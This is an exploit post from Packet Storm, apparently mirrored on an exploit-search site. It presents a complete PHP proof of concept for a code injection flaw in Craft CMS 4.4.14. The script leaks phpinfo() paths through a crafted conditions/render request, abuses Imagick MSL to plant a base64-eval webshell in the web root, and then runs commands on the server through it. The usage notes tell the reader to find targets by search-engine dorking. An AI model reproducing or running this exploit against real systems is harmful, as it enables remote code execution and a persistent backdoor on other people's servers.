Share
## https://sploitus.com/exploit?id=PACKETSTORM:182148
=============================================================================================================================================  
| # Title : Craft CMS 4.4.14 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://craftcms.com/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 116 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
<?php  
class CraftCMSExploit {  
private $target_uri;  
private $webshell;  
private $config = ['upload_tmp_dir' => null, 'document_root' => null];  
private $post_param;  
private $get_param;  
  
public function __construct($target_uri, $webshell = '') {  
$this->target_uri = $target_uri;  
$this->webshell = $webshell ? $webshell : $this->generateRandomString(8, 16) . '.php';  
$this->post_param = $this->generateRandomString(1, 8);  
$this->get_param = $this->generateRandomString(1, 8);  
}  
  
public function check_phpinfo() {  
// Sends a crafted request to extract upload_tmp_dir and document_root from phpinfo()  
$data = http_build_query([  
'action' => 'conditions/render',  
'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',  
'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'  
]);  
  
$response = $this->sendPostRequest($this->target_uri, $data);  
if ($response) {  
$this->parsePHPInfo($response);  
}  
}  
  
private function parsePHPInfo($response) {  
// Parses the phpinfo() HTML response to find upload_tmp_dir and document_root  
if (preg_match('/upload_tmp_dir.+<td class="v">(.*)<\/td>/i', $response, $matches)) {  
$this->config['upload_tmp_dir'] = $matches[1] == 'no value' ? '/tmp' : trim($matches[1]);  
}  
if (preg_match('/DOCUMENT_ROOT.+<td class="v">(.*)<\/td>/i', $response, $matches)) {  
$this->config['document_root'] = trim($matches[1]);  
}  
}  
  
public function upload_webshell() {  
// Generates an XML payload to upload the webshell via Imagick MSL  
$payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>  
<image>  
<read filename=\"caption:<?php @eval(base64_decode(\$_POST['{$this->post_param}'])); ?>\" />  
<write filename=\"info:{$this->config['document_root']}/{$this->webshell}\" />  
</image>";  
  
$form_data = [  
'action' => 'conditions/render',  
'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',  
'config' => '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}',  
'payload' => $payload  
];  
  
$response = $this->sendMultipartPostRequest($this->target_uri, $form_data);  
return strpos($response, '502') !== false;  
}  
  
public function execute_command($cmd) {  
// Executes a command on the server via the uploaded webshell  
$payload = base64_encode($cmd);  
$data = http_build_query([$this->post_param => $payload]);  
  
return $this->sendPostRequest($this->target_uri . '/' . $this->webshell, $data);  
}  
  
private function sendPostRequest($uri, $data) {  
$options = [  
'http' => [  
'header' => "Content-type: application/x-www-form-urlencoded\r\n",  
'method' => 'POST',  
'content' => $data,  
],  
];  
$context = stream_context_create($options);  
return file_get_contents($uri, false, $context);  
}  
  
private function sendMultipartPostRequest($uri, $data) {  
// Sends a multipart form-data POST request  
$boundary = uniqid();  
$delimiter = '------' . $boundary;  
  
$post_data = $this->buildMultipartData($data, $delimiter);  
  
$options = [  
'http' => [  
'header' => "Content-Type: multipart/form-data; boundary=" . $boundary . "\r\n",  
'method' => 'POST',  
'content' => $post_data,  
],  
];  
  
$context = stream_context_create($options);  
return file_get_contents($uri, false, $context);  
}  
  
private function buildMultipartData($data, $delimiter) {  
$post_data = '';  
foreach ($data as $name => $content) {  
$post_data .= "--$delimiter\r\n";  
$post_data .= "Content-Disposition: form-data; name=\"$name\"\r\n\r\n";  
$post_data .= "$content\r\n";  
}  
$post_data .= "--$delimiter--\r\n";  
return $post_data;  
}  
  
private function generateRandomString($min, $max) {  
$length = rand($min, $max);  
return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);  
}  
}  
  
// Usage  
$exploit = new CraftCMSExploit('http://target-craftcms.com');  
$exploit->check_phpinfo();  
if ($exploit->upload_webshell()) {  
echo $exploit->execute_command('whoami');  
}  
?>  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================